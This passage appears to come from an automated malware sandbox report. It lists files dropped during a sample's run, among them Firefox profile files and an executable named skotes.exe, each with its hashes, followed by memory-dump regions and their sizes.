                                  SHA512

                                  b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\prefs-1.js

                                  Filesize

                                  6KB

                                  MD5

                                  fef5665768c074608c529b4a75b45c31

                                  SHA1

                                  1647e0f65b580b5ed9017b12e5da145df211bfe6

                                  SHA256

                                  88476d09c60766c14767d86195ba7f5682f0d0b47dc3c6c54f5b4e3059ca63f8

                                  SHA512

                                  1d56721accdb15fc859cfdbe185de967f944bdb2a60d395134e34c4a80bd591c2877fed5659232ad1a671857e58b1cd94730796307fd53a97bb6ae35e0bc3a77

                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\prefs-1.js

                                  Filesize

                                  7KB

                                  MD5

                                  3ada3ab5b3f8c316260c1790277e6541

                                  SHA1

                                  18c093e66d54356e89ba681b0331a4ad368f6d39

                                  SHA256

                                  433e42dd9472a09c347478cb5794894562a106d7368db9e466bc6628b981e58e

                                  SHA512

                                  251a21823c747469990a2666ff5475bd438e16742e43d65299a19c5edd45ed915a256e639b2e06344dee89639deefa1ff365b7ba9e1441f177f69e142066cf2d

                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\prefs-1.js

                                  Filesize

                                  6KB

                                  MD5

                                  b532b64440e94bf10d45477b67f66689

                                  SHA1

                                  12494df7664621cca3e2222fbca4eb4a82bb6ed1

                                  SHA256

                                  437f3e4e1160a69f03a628829e2013ae4aae7f61c64f4a90769ea3645dffb0a2

                                  SHA512

                                  32c24e2e0f8ef2b5bb4e31d1def4f223b891e0eb92addef0b1e03284e715362c9189d69e86de392fde347b53a2c127880bc25dd75980a82b888566410c5f6fac

                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\sessionstore-backups\recovery.jsonlz4

                                  Filesize

                                  4KB

                                  MD5

                                  5c323e0b9f247f41052a0c7c532c583e

                                  SHA1

                                  f12b75246f95e6bd629f9e7fac149094b0d8b2a4

                                  SHA256

                                  b53428fd3b26a98b42ceb49c5d8b65c3547cba87f8274352e72bc4e8be2c3dd1

                                  SHA512

                                  5635d211455cb423aa42f694f63b2d4034a66c0e32a9a26bfc6a8eec03663b7f90063170c2d71047bfcfe949c41bca1fc1480350544937233a3f2f9d6609337e

                                • \Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

                                  Filesize

                                  1.8MB

                                  MD5

                                  9fd900925845d15e207472ae62b14c76

                                  SHA1

                                  c3f573f549ed539e9bd286b5563d850394331684

                                  SHA256

                                  4aa590b050b7b8d4f8b2ed95b93347e9f27151bd78430aa57ec787090641bcd5

                                  SHA512

                                  1e3b4a30c3e5691ebe788237f646a8cb92b0728da6ac31985bf2fd01db0666a552ec9f78793d244de7120afc71b11362036fc158c4e8d9523929bb6dc67caff8

                                • memory/1548-142-0x0000000000D00000-0x0000000001395000-memory.dmp

                                  Filesize

                                  6.6MB

                                • memory/1548-106-0x0000000000D00000-0x0000000001395000-memory.dmp

                                  Filesize

                                  6.6MB

                                • memory/1972-63-0x0000000000C00000-0x0000000001847000-memory.dmp

                                  Filesize

                                  12.3MB

                                • memory/1972-266-0x0000000000C00000-0x0000000001847000-memory.dmp

                                  Filesize

                                  12.3MB

                                • memory/1972-91-0x0000000000C00000-0x0000000001847000-memory.dmp

                                  Filesize

                                  12.3MB

                                • memory/1972-521-0x0000000000C00000-0x0000000001847000-memory.dmp

                                  Filesize

                                  12.3MB

                                • memory/1972-144-0x0000000000C00000-0x0000000001847000-memory.dmp

                                  Filesize

                                  12.3MB

                                • memory/1972-503-0x0000000000C00000-0x0000000001847000-memory.dmp

                                  Filesize

                                  12.3MB

                                • memory/1972-419-0x0000000000C00000-0x0000000001847000-memory.dmp

                                  Filesize

                                  12.3MB

                                • memory/1972-81-0x0000000069CC0000-0x000000006A71B000-memory.dmp

                                  Filesize

                                  10.4MB

                                • memory/1972-402-0x0000000000C00000-0x0000000001847000-memory.dmp

                                  Filesize

                                  12.3MB

                                • memory/1972-334-0x0000000000C00000-0x0000000001847000-memory.dmp

                                  Filesize

                                  12.3MB

                                • memory/2472-1-0x00000000773C0000-0x00000000773C2000-memory.dmp

                                  Filesize

                                  8KB

                                • memory/2472-18-0x0000000007010000-0x00000000074B9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2472-2-0x0000000001021000-0x000000000104F000-memory.dmp

                                  Filesize

                                  184KB

                                • memory/2472-3-0x0000000001020000-0x00000000014C9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2472-5-0x0000000001020000-0x00000000014C9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2472-0-0x0000000001020000-0x00000000014C9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2472-9-0x0000000001020000-0x00000000014C9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2472-19-0x0000000001020000-0x00000000014C9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2472-21-0x0000000007010000-0x00000000074B9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2824-143-0x0000000000D00000-0x0000000001199000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/2824-78-0x0000000000D00000-0x0000000001199000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/2952-391-0x0000000000D50000-0x00000000011F9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2952-77-0x00000000067F0000-0x0000000006C89000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/2952-42-0x0000000000D50000-0x00000000011F9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2952-418-0x0000000000D50000-0x00000000011F9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2952-90-0x00000000067F0000-0x0000000007437000-memory.dmp

                                  Filesize

                                  12.3MB

                                • memory/2952-421-0x0000000000D50000-0x00000000011F9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2952-25-0x0000000000D50000-0x00000000011F9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2952-23-0x0000000000D50000-0x00000000011F9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2952-80-0x0000000000D50000-0x00000000011F9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2952-22-0x0000000000D50000-0x00000000011F9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2952-44-0x0000000000D50000-0x00000000011F9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2952-61-0x00000000067F0000-0x0000000007437000-memory.dmp

                                  Filesize

                                  12.3MB

                                • memory/2952-62-0x00000000067F0000-0x0000000007437000-memory.dmp

                                  Filesize

                                  12.3MB

                                • memory/2952-233-0x0000000000D50000-0x00000000011F9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2952-294-0x0000000000D50000-0x00000000011F9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2952-43-0x0000000000D50000-0x00000000011F9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2952-105-0x00000000067F0000-0x0000000006E85000-memory.dmp

                                  Filesize

                                  6.6MB

                                • memory/2952-145-0x00000000067F0000-0x0000000006C89000-memory.dmp

                                  Filesize

                                  4.6MB

                                • memory/2952-520-0x0000000000D50000-0x00000000011F9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2952-234-0x00000000067F0000-0x0000000006E85000-memory.dmp

                                  Filesize

                                  6.6MB

                                • memory/2952-554-0x0000000000D50000-0x00000000011F9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2952-551-0x0000000000D50000-0x00000000011F9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2952-531-0x0000000000D50000-0x00000000011F9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2952-538-0x0000000000D50000-0x00000000011F9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2952-541-0x0000000000D50000-0x00000000011F9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/2952-548-0x0000000000D50000-0x00000000011F9000-memory.dmp

                                  Filesize

                                  4.7MB

                                • memory/3152-529-0x0000000000080000-0x0000000000092000-memory.dmp

                                  Filesize

                                  72KB

                                • memory/3152-530-0x0000000073A50000-0x0000000073B84000-memory.dmp

                                  Filesize

                                  1.2MB

                                • memory/3760-545-0x0000000000080000-0x0000000000092000-memory.dmp

                                  Filesize

                                  72KB

                                We care about your privacy.

                                This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.